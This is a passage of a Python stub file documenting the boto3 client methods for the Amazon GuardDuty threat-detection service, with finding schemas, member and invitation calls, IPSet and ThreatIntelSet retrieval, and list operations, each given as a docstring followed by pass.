The Amazon Resource Name (ARN) of the AWS Outpost. Only applicable to AWS Outposts instances.
LaunchTime (string) --
The launch time of the EC2 instance.
NetworkInterfaces (list) --
The elastic network interface information of the EC2 instance.
(dict) --
Contains information about the elastic network interface of the EC2 instance.
Ipv6Addresses (list) --
A list of IPv6 addresses for the EC2 instance.
(string) --
NetworkInterfaceId (string) --
The ID of the network interface.
PrivateDnsName (string) --
The private DNS name of the EC2 instance.
PrivateIpAddress (string) --
The private IP address of the EC2 instance.
PrivateIpAddresses (list) --
Other private IP address information of the EC2 instance.
(dict) --
Contains other private IP address information of the EC2 instance.
PrivateDnsName (string) --
The private DNS name of the EC2 instance.
PrivateIpAddress (string) --
The private IP address of the EC2 instance.
PublicDnsName (string) --
The public DNS name of the EC2 instance.
PublicIp (string) --
The public IP address of the EC2 instance.
SecurityGroups (list) --
The security groups associated with the EC2 instance.
(dict) --
Contains information about the security groups associated with the EC2 instance.
GroupId (string) --
The security group ID of the EC2 instance.
GroupName (string) --
The security group name of the EC2 instance.
SubnetId (string) --
The subnet ID of the EC2 instance.
VpcId (string) --
The VPC ID of the EC2 instance.
Platform (string) --
The platform of the EC2 instance.
ProductCodes (list) --
The product code of the EC2 instance.
(dict) --
Contains information about the product code for the EC2 instance.
Code (string) --
The product code information.
ProductType (string) --
The product code type.
Tags (list) --
The tags of the EC2 instance.
(dict) --
Contains information about a tag associated with the EC2 instance.
Key (string) --
The EC2 instance tag key.
Value (string) --
The EC2 instance tag value.
ResourceType (string) --
The type of AWS resource.
SchemaVersion (string) --
The version of the schema used for the finding.
Service (dict) --
Contains additional information about the generated finding.
Action (dict) --
Information about the activity that is described in a finding.
ActionType (string) --
The GuardDuty finding activity type.
AwsApiCallAction (dict) --
Information about the AWS_API_CALL action described in this finding.
Api (string) --
The AWS API name.
CallerType (string) --
The AWS API caller type.
DomainDetails (dict) --
The domain information for the AWS API call.
Domain (string) --
The domain information for the AWS API call.
RemoteIpDetails (dict) --
The remote IP information of the connection.
City (dict) --
The city information of the remote IP address.
CityName (string) --
The city name of the remote IP address.
Country (dict) --
The country code of the remote IP address.
CountryCode (string) --
The country code of the remote IP address.
CountryName (string) --
The country name of the remote IP address.
GeoLocation (dict) --
The location information of the remote IP address.
Lat (float) --
The latitude information of the remote IP address.
Lon (float) --
The longitude information of the remote IP address.
IpAddressV4 (string) --
The IPv4 remote address of the connection.
Organization (dict) --
The ISP organization information of the remote IP address.
Asn (string) --
The Autonomous System Number (ASN) of the internet provider of the remote IP address.
AsnOrg (string) --
The organization that registered this ASN.
Isp (string) --
The ISP information for the internet provider.
Org (string) --
The name of the internet provider.
ServiceName (string) --
The AWS service name whose API was invoked.
DnsRequestAction (dict) --
Information about the DNS_REQUEST action described in this finding.
Domain (string) --
The domain information for the API request.
NetworkConnectionAction (dict) --
Information about the NETWORK_CONNECTION action described in this finding.
Blocked (boolean) --
Indicates whether EC2 blocked the network connection to your instance.
ConnectionDirection (string) --
The network connection direction.
LocalPortDetails (dict) --
The local port information of the connection.
Port (integer) --
The port number of the local connection.
PortName (string) --
The port name of the local connection.
Protocol (string) --
The network connection protocol.
LocalIpDetails (dict) --
The local IP information of the connection.
IpAddressV4 (string) --
The IPv4 local address of the connection.
RemoteIpDetails (dict) --
The remote IP information of the connection.
City (dict) --
The city information of the remote IP address.
CityName (string) --
The city name of the remote IP address.
Country (dict) --
The country code of the remote IP address.
CountryCode (string) --
The country code of the remote IP address.
CountryName (string) --
The country name of the remote IP address.
GeoLocation (dict) --
The location information of the remote IP address.
Lat (float) --
The latitude information of the remote IP address.
Lon (float) --
The longitude information of the remote IP address.
IpAddressV4 (string) --
The IPv4 remote address of the connection.
Organization (dict) --
The ISP organization information of the remote IP address.
Asn (string) --
The Autonomous System Number (ASN) of the internet provider of the remote IP address.
AsnOrg (string) --
The organization that registered this ASN.
Isp (string) --
The ISP information for the internet provider.
Org (string) --
The name of the internet provider.
RemotePortDetails (dict) --
The remote port information of the connection.
Port (integer) --
The port number of the remote connection.
PortName (string) --
The port name of the remote connection.
PortProbeAction (dict) --
Information about the PORT_PROBE action described in this finding.
Blocked (boolean) --
Indicates whether EC2 blocked the port probe to the instance, such as with an ACL.
PortProbeDetails (list) --
A list of objects related to port probe details.
(dict) --
Contains information about the port probe details.
LocalPortDetails (dict) --
The local port information of the connection.
Port (integer) --
The port number of the local connection.
PortName (string) --
The port name of the local connection.
LocalIpDetails (dict) --
The local IP information of the connection.
IpAddressV4 (string) --
The IPv4 local address of the connection.
RemoteIpDetails (dict) --
The remote IP information of the connection.
City (dict) --
The city information of the remote IP address.
CityName (string) --
The city name of the remote IP address.
Country (dict) --
The country code of the remote IP address.
CountryCode (string) --
The country code of the remote IP address.
CountryName (string) --
The country name of the remote IP address.
GeoLocation (dict) --
The location information of the remote IP address.
Lat (float) --
The latitude information of the remote IP address.
Lon (float) --
The longitude information of the remote IP address.
IpAddressV4 (string) --
The IPv4 remote address of the connection.
Organization (dict) --
The ISP organization information of the remote IP address.
Asn (string) --
The Autonomous System Number (ASN) of the internet provider of the remote IP address.
AsnOrg (string) --
The organization that registered this ASN.
Isp (string) --
The ISP information for the internet provider.
Org (string) --
The name of the internet provider.
Evidence (dict) --
An evidence object associated with the service.
ThreatIntelligenceDetails (list) --
A list of threat intelligence details related to the evidence.
(dict) --
An instance of a threat intelligence detail that constitutes evidence for the finding.
ThreatListName (string) --
The name of the threat intelligence list that triggered the finding.
ThreatNames (list) --
A list of names of the threats in the threat intelligence list that triggered the finding.
(string) --
Archived (boolean) --
Indicates whether this finding is archived.
Count (integer) --
The total count of the occurrences of this finding type.
DetectorId (string) --
The detector ID for the GuardDuty service.
EventFirstSeen (string) --
The first-seen timestamp of the activity that prompted GuardDuty to generate this finding.
EventLastSeen (string) --
The last-seen timestamp of the activity that prompted GuardDuty to generate this finding.
ResourceRole (string) --
The resource role information for this finding.
ServiceName (string) --
The name of the AWS service (GuardDuty) that generated a finding.
UserFeedback (string) --
Feedback that was submitted about the finding.
Severity (float) --
The severity of the finding.
Title (string) --
The title of the finding.
Type (string) --
The type of finding.
UpdatedAt (string) --
The time and date when the finding was last updated.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'Findings': [
{
'AccountId': 'string',
'Arn': 'string',
'Confidence': 123.0,
'CreatedAt': 'string',
'Description': 'string',
'Id': 'string',
'Partition': 'string',
'Region': 'string',
'Resource': {
'AccessKeyDetails': {
'AccessKeyId': 'string',
'PrincipalId': 'string',
'UserName': 'string',
'UserType': 'string'
},
'InstanceDetails': {
'AvailabilityZone': 'string',
'IamInstanceProfile': {
'Arn': 'string',
'Id': 'string'
},
'ImageDescription': 'string',
'ImageId': 'string',
'InstanceId': 'string',
'InstanceState': 'string',
'InstanceType': 'string',
'OutpostArn': 'string',
'LaunchTime': 'string',
'NetworkInterfaces': [
{
'Ipv6Addresses': [
'string',
],
'NetworkInterfaceId': 'string',
'PrivateDnsName': 'string',
'PrivateIpAddress': 'string',
'PrivateIpAddresses': [
{
'PrivateDnsName': 'string',
'PrivateIpAddress': 'string'
},
],
'PublicDnsName': 'string',
'PublicIp': 'string',
'SecurityGroups': [
{
'GroupId': 'string',
'GroupName': 'string'
},
],
'SubnetId': 'string',
'VpcId': 'string'
},
],
'Platform': 'string',
'ProductCodes': [
{
'Code': 'string',
'ProductType': 'string'
},
],
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
},
'ResourceType': 'string'
},
'SchemaVersion': 'string',
'Service': {
'Action': {
'ActionType': 'string',
'AwsApiCallAction': {
'Api': 'string',
'CallerType': 'string',
'DomainDetails': {
'Domain': 'string'
},
'RemoteIpDetails': {
'City': {
'CityName': 'string'
},
'Country': {
'CountryCode': 'string',
'CountryName': 'string'
},
'GeoLocation': {
'Lat': 123.0,
'Lon': 123.0
},
'IpAddressV4': 'string',
'Organization': {
'Asn': 'string',
'AsnOrg': 'string',
'Isp': 'string',
'Org': 'string'
}
},
'ServiceName': 'string'
},
'DnsRequestAction': {
'Domain': 'string'
},
'NetworkConnectionAction': {
'Blocked': True|False,
'ConnectionDirection': 'string',
'LocalPortDetails': {
'Port': 123,
'PortName': 'string'
},
'Protocol': 'string',
'LocalIpDetails': {
'IpAddressV4': 'string'
},
'RemoteIpDetails': {
'City': {
'CityName': 'string'
},
'Country': {
'CountryCode': 'string',
'CountryName': 'string'
},
'GeoLocation': {
'Lat': 123.0,
'Lon': 123.0
},
'IpAddressV4': 'string',
'Organization': {
'Asn': 'string',
'AsnOrg': 'string',
'Isp': 'string',
'Org': 'string'
}
},
'RemotePortDetails': {
'Port': 123,
'PortName': 'string'
}
},
'PortProbeAction': {
'Blocked': True|False,
'PortProbeDetails': [
{
'LocalPortDetails': {
'Port': 123,
'PortName': 'string'
},
'LocalIpDetails': {
'IpAddressV4': 'string'
},
'RemoteIpDetails': {
'City': {
'CityName': 'string'
},
'Country': {
'CountryCode': 'string',
'CountryName': 'string'
},
'GeoLocation': {
'Lat': 123.0,
'Lon': 123.0
},
'IpAddressV4': 'string',
'Organization': {
'Asn': 'string',
'AsnOrg': 'string',
'Isp': 'string',
'Org': 'string'
}
}
},
]
}
},
'Evidence': {
'ThreatIntelligenceDetails': [
{
'ThreatListName': 'string',
'ThreatNames': [
'string',
]
},
]
},
'Archived': True|False,
'Count': 123,
'DetectorId': 'string',
'EventFirstSeen': 'string',
'EventLastSeen': 'string',
'ResourceRole': 'string',
'ServiceName': 'string',
'UserFeedback': 'string'
},
'Severity': 123.0,
'Title': 'string',
'Type': 'string',
'UpdatedAt': 'string'
},
]
}
:returns:
(string) --
"""
pass
def get_findings_statistics(DetectorId=None, FindingStatisticTypes=None, FindingCriteria=None):
"""
Lists Amazon GuardDuty findings statistics for the specified detector ID.
See also: AWS API Documentation
Exceptions
:example: response = client.get_findings_statistics(
DetectorId='string',
FindingStatisticTypes=[
'COUNT_BY_SEVERITY',
],
FindingCriteria={
'Criterion': {
'string': {
'Eq': [
'string',
],
'Neq': [
'string',
],
'Gt': 123,
'Gte': 123,
'Lt': 123,
'Lte': 123,
'Equals': [
'string',
],
'NotEquals': [
'string',
],
'GreaterThan': 123,
'GreaterThanOrEqual': 123,
'LessThan': 123,
'LessThanOrEqual': 123
}
}
}
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe ID of the detector that specifies the GuardDuty service whose findings\' statistics you want to retrieve.\n
:type FindingStatisticTypes: list
:param FindingStatisticTypes: [REQUIRED]\nThe types of finding statistics to retrieve.\n\n(string) --\n\n
:type FindingCriteria: dict
:param FindingCriteria: Represents the criteria that is used for querying findings.\n\nCriterion (dict) --Represents a map of finding properties that match specified conditions and values when querying findings.\n\n(string) --\n(dict) --Contains information about the condition.\n\nEq (list) --Represents the equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nNeq (list) --Represents the not equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nGt (integer) --Represents a greater than condition to be applied to a single field when querying for findings.\n\nGte (integer) --Represents a greater than or equal condition to be applied to a single field when querying for findings.\n\nLt (integer) --Represents a less than condition to be applied to a single field when querying for findings.\n\nLte (integer) --Represents a less than or equal condition to be applied to a single field when querying for findings.\n\nEquals (list) --Represents an equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nNotEquals (list) --Represents a not equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nGreaterThan (integer) --Represents a greater than condition to be applied to a single field when querying for findings.\n\nGreaterThanOrEqual (integer) --Represents a greater than or equal condition to be applied to a single field when querying for findings.\n\nLessThan (integer) --Represents a less than condition to be applied to a single field when querying for findings.\n\nLessThanOrEqual (integer) --Represents a less than or equal condition to be applied to a single field when querying for findings.\n\n\n\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'FindingStatistics': {
'CountBySeverity': {
'string': 123
}
}
}
Response Structure
(dict) --
FindingStatistics (dict) --
The finding statistics object.
CountBySeverity (dict) --
Represents a map of severity to count statistics for a set of findings.
(string) --
(integer) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'FindingStatistics': {
'CountBySeverity': {
'string': 123
}
}
}
:returns:
(string) --
(integer) --
"""
pass
def get_invitations_count():
"""
Returns the count of all GuardDuty membership invitations that were sent to the current member account except the currently accepted invitation.
See also: AWS API Documentation
Exceptions
:example: response = client.get_invitations_count()
:rtype: dict
ReturnsResponse Syntax{
'InvitationsCount': 123
}
Response Structure
(dict) --
InvitationsCount (integer) --The number of received invitations.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'InvitationsCount': 123
}
"""
pass
def get_ip_set(DetectorId=None, IpSetId=None):
"""
Retrieves the IPSet specified by the ipSetId .
See also: AWS API Documentation
Exceptions
:example: response = client.get_ip_set(
DetectorId='string',
IpSetId='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector that the IPSet is associated with.\n
:type IpSetId: string
:param IpSetId: [REQUIRED]\nThe unique ID of the IPSet to retrieve.\n
:rtype: dict
ReturnsResponse Syntax
{
'Name': 'string',
'Format': 'TXT'|'STIX'|'OTX_CSV'|'ALIEN_VAULT'|'PROOF_POINT'|'FIRE_EYE',
'Location': 'string',
'Status': 'INACTIVE'|'ACTIVATING'|'ACTIVE'|'DEACTIVATING'|'ERROR'|'DELETE_PENDING'|'DELETED',
'Tags': {
'string': 'string'
}
}
Response Structure
(dict) --
Name (string) --
The user-friendly name for the IPSet.
Format (string) --
The format of the file that contains the IPSet.
Location (string) --
The URI of the file that contains the IPSet.
Status (string) --
The status of IPSet file that was uploaded.
Tags (dict) --
The tags of the IPSet resource.
(string) --
(string) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'Name': 'string',
'Format': 'TXT'|'STIX'|'OTX_CSV'|'ALIEN_VAULT'|'PROOF_POINT'|'FIRE_EYE',
'Location': 'string',
'Status': 'INACTIVE'|'ACTIVATING'|'ACTIVE'|'DEACTIVATING'|'ERROR'|'DELETE_PENDING'|'DELETED',
'Tags': {
'string': 'string'
}
}
:returns:
(string) --
(string) --
"""
pass
def get_master_account(DetectorId=None):
"""
Provides the details for the GuardDuty master account associated with the current GuardDuty member account.
See also: AWS API Documentation
Exceptions
:example: response = client.get_master_account(
DetectorId='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector of the GuardDuty member account.\n
:rtype: dict
ReturnsResponse Syntax{
'Master': {
'AccountId': 'string',
'InvitationId': 'string',
'RelationshipStatus': 'string',
'InvitedAt': 'string'
}
}
Response Structure
(dict) --
Master (dict) --The master account details.
AccountId (string) --The ID of the account used as the master account.
InvitationId (string) --The value used to validate the master account to the member account.
RelationshipStatus (string) --The status of the relationship between the master and member accounts.
InvitedAt (string) --The timestamp when the invitation was sent.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'Master': {
'AccountId': 'string',
'InvitationId': 'string',
'RelationshipStatus': 'string',
'InvitedAt': 'string'
}
}
"""
pass
def get_members(DetectorId=None, AccountIds=None):
"""
Retrieves GuardDuty member accounts (to the current GuardDuty master account) specified by the account IDs.
See also: AWS API Documentation
Exceptions
:example: response = client.get_members(
DetectorId='string',
AccountIds=[
'string',
]
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector of the GuardDuty account whose members you want to retrieve.\n
:type AccountIds: list
:param AccountIds: [REQUIRED]\nA list of account IDs of the GuardDuty member accounts that you want to describe.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Members': [
{
'AccountId': 'string',
'DetectorId': 'string',
'MasterId': 'string',
'Email': 'string',
'RelationshipStatus': 'string',
'InvitedAt': 'string',
'UpdatedAt': 'string'
},
],
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
Response Structure
(dict) --
Members (list) --
A list of members.
(dict) --
Contains information about the member account.
AccountId (string) --
The ID of the member account.
DetectorId (string) --
The detector ID of the member account.
MasterId (string) --
The master account ID.
Email (string) --
The email address of the member account.
RelationshipStatus (string) --
The status of the relationship between the member and the master.
InvitedAt (string) --
The timestamp when the invitation was sent.
UpdatedAt (string) --
The last-updated timestamp of the member.
UnprocessedAccounts (list) --
A list of objects that contain the unprocessed account and a result string that explains why it was unprocessed.
(dict) --
Contains information about the accounts that weren\'t processed.
AccountId (string) --
The AWS account ID.
Result (string) --
A reason why the account hasn\'t been processed.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'Members': [
{
'AccountId': 'string',
'DetectorId': 'string',
'MasterId': 'string',
'Email': 'string',
'RelationshipStatus': 'string',
'InvitedAt': 'string',
'UpdatedAt': 'string'
},
],
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
ReturnsA paginator object.
"""
pass
def get_threat_intel_set(DetectorId=None, ThreatIntelSetId=None):
"""
Retrieves the ThreatIntelSet that is specified by the ThreatIntelSet ID.
See also: AWS API Documentation
Exceptions
:example: response = client.get_threat_intel_set(
DetectorId='string',
ThreatIntelSetId='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector that the threatIntelSet is associated with.\n
:type ThreatIntelSetId: string
:param ThreatIntelSetId: [REQUIRED]\nThe unique ID of the threatIntelSet that you want to get.\n
:rtype: dict
ReturnsResponse Syntax
{
'Name': 'string',
'Format': 'TXT'|'STIX'|'OTX_CSV'|'ALIEN_VAULT'|'PROOF_POINT'|'FIRE_EYE',
'Location': 'string',
'Status': 'INACTIVE'|'ACTIVATING'|'ACTIVE'|'DEACTIVATING'|'ERROR'|'DELETE_PENDING'|'DELETED',
'Tags': {
'string': 'string'
}
}
Response Structure
(dict) --
Name (string) --
A user-friendly ThreatIntelSet name displayed in all findings that are generated by activity that involves IP addresses included in this ThreatIntelSet.
Format (string) --
The format of the threatIntelSet.
Location (string) --
The URI of the file that contains the ThreatIntelSet.
Status (string) --
The status of threatIntelSet file uploaded.
Tags (dict) --
The tags of the threat list resource.
(string) --
(string) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'Name': 'string',
'Format': 'TXT'|'STIX'|'OTX_CSV'|'ALIEN_VAULT'|'PROOF_POINT'|'FIRE_EYE',
'Location': 'string',
'Status': 'INACTIVE'|'ACTIVATING'|'ACTIVE'|'DEACTIVATING'|'ERROR'|'DELETE_PENDING'|'DELETED',
'Tags': {
'string': 'string'
}
}
:returns:
(string) --
(string) --
"""
pass
def get_waiter(waiter_name=None):
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters\nsection of the service docs for a list of available waiters.
:rtype: botocore.waiter.Waiter
"""
pass
def invite_members(DetectorId=None, AccountIds=None, DisableEmailNotification=None, Message=None):
"""
Invites other AWS accounts (created as members of the current AWS account by CreateMembers) to enable GuardDuty, and allow the current AWS account to view and manage these accounts\' GuardDuty findings on their behalf as the master account.
See also: AWS API Documentation
Exceptions
:example: response = client.invite_members(
DetectorId='string',
AccountIds=[
'string',
],
DisableEmailNotification=True|False,
Message='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector of the GuardDuty account that you want to invite members with.\n
:type AccountIds: list
:param AccountIds: [REQUIRED]\nA list of account IDs of the accounts that you want to invite to GuardDuty as members.\n\n(string) --\n\n
:type DisableEmailNotification: boolean
:param DisableEmailNotification: A Boolean value that specifies whether you want to disable email notification to the accounts that you\xe2\x80\x99re inviting to GuardDuty as members.
:type Message: string
:param Message: The invitation message that you want to send to the accounts that you\xe2\x80\x99re inviting to GuardDuty as members.
:rtype: dict
ReturnsResponse Syntax
{
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
Response Structure
(dict) --
UnprocessedAccounts (list) --
A list of objects that contain the unprocessed account and a result string that explains why it was unprocessed.
(dict) --
Contains information about the accounts that weren\'t processed.
AccountId (string) --
The AWS account ID.
Result (string) --
A reason why the account hasn\'t been processed.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def list_detectors(MaxResults=None, NextToken=None):
"""
Lists detectorIds of all the existing Amazon GuardDuty detector resources.
See also: AWS API Documentation
Exceptions
:example: response = client.list_detectors(
MaxResults=123,
NextToken='string'
)
:type MaxResults: integer
:param MaxResults: You can use this parameter to indicate the maximum number of items that you want in the response. The default value is 50. The maximum value is 50.
:type NextToken: string
:param NextToken: You can use this parameter when paginating results. Set the value of this parameter to null on your first call to the list action. For subsequent calls to the action, fill nextToken in the request with the value of NextToken from the previous response to continue listing data.
:rtype: dict
ReturnsResponse Syntax
{
'DetectorIds': [
'string',
],
'NextToken': 'string'
}
Response Structure
(dict) --
DetectorIds (list) --
A list of detector IDs.
(string) --
NextToken (string) --
The pagination parameter to be used on the next list operation to retrieve more items.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'DetectorIds': [
'string',
],
'NextToken': 'string'
}
:returns:
(string) --
"""
pass
def list_filters(DetectorId=None, MaxResults=None, NextToken=None):
"""
Returns a paginated list of the current filters.
See also: AWS API Documentation
Exceptions
:example: response = client.list_filters(
DetectorId='string',
MaxResults=123,
NextToken='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector that the filter is associated with.\n
:type MaxResults: integer
:param MaxResults: You can use this parameter to indicate the maximum number of items that you want in the response. The default value is 50. The maximum value is 50.
:type NextToken: string
:param NextToken: You can use this parameter when paginating results. Set the value of this parameter to null on your first call to the list action. For subsequent calls to the action, fill nextToken in the request with the value of NextToken from the previous response to continue listing data.
:rtype: dict
ReturnsResponse Syntax
{
'FilterNames': [
'string',
],
'NextToken': 'string'
}
Response Structure
(dict) --
FilterNames (list) --
A list of filter names.
(string) --
NextToken (string) --
The pagination parameter to be used on the next list operation to retrieve more items.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'FilterNames': [
'string',
],
'NextToken': 'string'
}
:returns:
(string) --
"""
pass
def list_findings(DetectorId=None, FindingCriteria=None, SortCriteria=None, MaxResults=None, NextToken=None):
"""
Lists Amazon GuardDuty findings for the specified detector ID.
See also: AWS API Documentation
Exceptions
:example: response = client.list_findings(
DetectorId='string',
FindingCriteria={
'Criterion': {
'string': {
'Eq': [
'string',
],
'Neq': [
'string',
],
'Gt': 123,
'Gte': 123,
'Lt': 123,
'Lte': 123,
'Equals': [
'string',
],
'NotEquals': [
'string',
],
'GreaterThan': 123,
'GreaterThanOrEqual': 123,
'LessThan': 123,
'LessThanOrEqual': 123
}
}
},
SortCriteria={
'AttributeName': 'string',
'OrderBy': 'ASC'|'DESC'
},
MaxResults=123,
NextToken='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe ID of the detector that specifies the GuardDuty service whose findings you want to list.\n
:type FindingCriteria: dict
:param FindingCriteria: Represents the criteria used for querying findings. Valid values include:\n\nJSON field name\naccountId\nregion\nconfidence\nid\nresource.accessKeyDetails.accessKeyId\nresource.accessKeyDetails.principalId\nresource.accessKeyDetails.userName\nresource.accessKeyDetails.userType\nresource.instanceDetails.iamInstanceProfile.id\nresource.instanceDetails.imageId\nresource.instanceDetails.instanceId\nresource.instanceDetails.outpostArn\nresource.instanceDetails.networkInterfaces.ipv6Addresses\nresource.instanceDetails.networkInterfaces.privateIpAddresses.privateIpAddress\nresource.instanceDetails.networkInterfaces.publicDnsName\nresource.instanceDetails.networkInterfaces.publicIp\nresource.instanceDetails.networkInterfaces.securityGroups.groupId\nresource.instanceDetails.networkInterfaces.securityGroups.groupName\nresource.instanceDetails.networkInterfaces.subnetId\nresource.instanceDetails.networkInterfaces.vpcId\nresource.instanceDetails.tags.key\nresource.instanceDetails.tags.value\nresource.resourceType\nservice.action.actionType\nservice.action.awsApiCallAction.api\nservice.action.awsApiCallAction.callerType\nservice.action.awsApiCallAction.remoteIpDetails.city.cityName\nservice.action.awsApiCallAction.remoteIpDetails.country.countryName\nservice.action.awsApiCallAction.remoteIpDetails.ipAddressV4\nservice.action.awsApiCallAction.remoteIpDetails.organization.asn\nservice.action.awsApiCallAction.remoteIpDetails.organization.asnOrg\nservice.action.awsApiCallAction.serviceName\nservice.action.dnsRequestAction.domain\nservice.action.networkConnectionAction.blocked\nservice.action.networkConnectionAction.connectionDirection\nservice.action.networkConnectionAction.localPortDetails.port\nservice.action.networkConnectionAction.protocol\nservice.action.networkConnectionAction.localIpDetails.ipAddressV4\nservice.action.networkConnectionAction.remoteIpDetails.city.cityName\nservice.action.networkConnectionAction.remoteIpDetails.country.countryName\nservice.action.networkConnectionAction.remoteIpDetails.ipAddressV4\nservice.action.networkConnectionAction.remoteIpDetails.organization.asn\nservice.action.networkConnectionAction.remoteIpDetails.organization.asnOrg\nservice.action.networkConnectionAction.remotePortDetails.port\nservice.additionalInfo.threatListName\nservice.archived When this attribute is set to \'true\', only archived findings are listed. When it\'s set to \'false\', only unarchived findings are listed. When this attribute is not set, all existing findings are listed.\nservice.resourceRole\nseverity\ntype\nupdatedAt Type: Timestamp in Unix Epoch millisecond format: 1486685375000\n\n\nCriterion (dict) --Represents a map of finding properties that match specified conditions and values when querying findings.\n\n(string) --\n(dict) --Contains information about the condition.\n\nEq (list) --Represents the equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nNeq (list) --Represents the not equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nGt (integer) --Represents a greater than condition to be applied to a single field when querying for findings.\n\nGte (integer) --Represents a greater than or equal condition to be applied to a single field when querying for findings.\n\nLt (integer) --Represents a less than condition to be applied to a single field when querying for findings.\n\nLte (integer) --Represents a less than or equal condition to be applied to a single field when querying for findings.\n\nEquals (list) --Represents an equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nNotEquals (list) --Represents a not equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nGreaterThan (integer) --Represents a greater than condition to be applied to a single field when querying for findings.\n\nGreaterThanOrEqual (integer) --Represents a greater than or equal condition to be applied to a single field when querying for findings.\n\nLessThan (integer) --Represents a less than condition to be applied to a single field when querying for findings.\n\nLessThanOrEqual (integer) --Represents a less than or equal condition to be applied to a single field when querying for findings.\n\n\n\n\n\n\n\n\n
:type SortCriteria: dict
:param SortCriteria: Represents the criteria used for sorting findings.\n\nAttributeName (string) --Represents the finding attribute (for example, accountId) to sort findings by.\n\nOrderBy (string) --The order by which the sorted findings are to be displayed.\n\n\n
:type MaxResults: integer
:param MaxResults: You can use this parameter to indicate the maximum number of items you want in the response. The default value is 50. The maximum value is 50.
:type NextToken: string
:param NextToken: You can use this parameter when paginating results. Set the value of this parameter to null on your first call to the list action. For subsequent calls to the action, fill nextToken in the request with the value of NextToken from the previous response to continue listing data.
:rtype: dict
ReturnsResponse Syntax
{
'FindingIds': [
'string',
],
'NextToken': 'string'
}
Response Structure
(dict) --
FindingIds (list) --
The IDs of the findings that you\'re listing.
(string) --
NextToken (string) --
The pagination parameter to be used on the next list operation to retrieve more items.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'FindingIds': [
'string',
],
'NextToken': 'string'
}
:returns:
(string) --
"""
pass
def list_invitations(MaxResults=None, NextToken=None):
"""
Lists all GuardDuty membership invitations that were sent to the current AWS account.
See also: AWS API Documentation
Exceptions
:example: response = client.list_invitations(
MaxResults=123,
NextToken='string'
)
:type MaxResults: integer
:param MaxResults: You can use this parameter to indicate the maximum number of items that you want in the response. The default value is 50. The maximum value is 50.
:type NextToken: string
:param NextToken: You can use this parameter when paginating results. Set the value of this parameter to null on your first call to the list action. For subsequent calls to the action, fill nextToken in the request with the value of NextToken from the previous response to continue listing data.
:rtype: dict
ReturnsResponse Syntax
{
'Invitations': [
{
'AccountId': 'string',
'InvitationId': 'string',
'RelationshipStatus': 'string',
'InvitedAt': 'string'
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
Invitations (list) --
A list of invitation descriptions.
(dict) --
Contains information about the invitation to become a member account.
AccountId (string) --
The ID of the account that the invitation was sent from.
InvitationId (string) --
The ID of the invitation. This value is used to validate the inviter account to the member account.
RelationshipStatus (string) --
The status of the relationship between the inviter and invitee accounts.
InvitedAt (string) --
The timestamp when the invitation was sent.
NextToken (string) --
The pagination parameter to be used on the next list operation to retrieve more items.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'Invitations': [
{
'AccountId': 'string',
'InvitationId': 'string',
'RelationshipStatus': 'string',
'InvitedAt': 'string'
},
],
'NextToken': 'string'
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
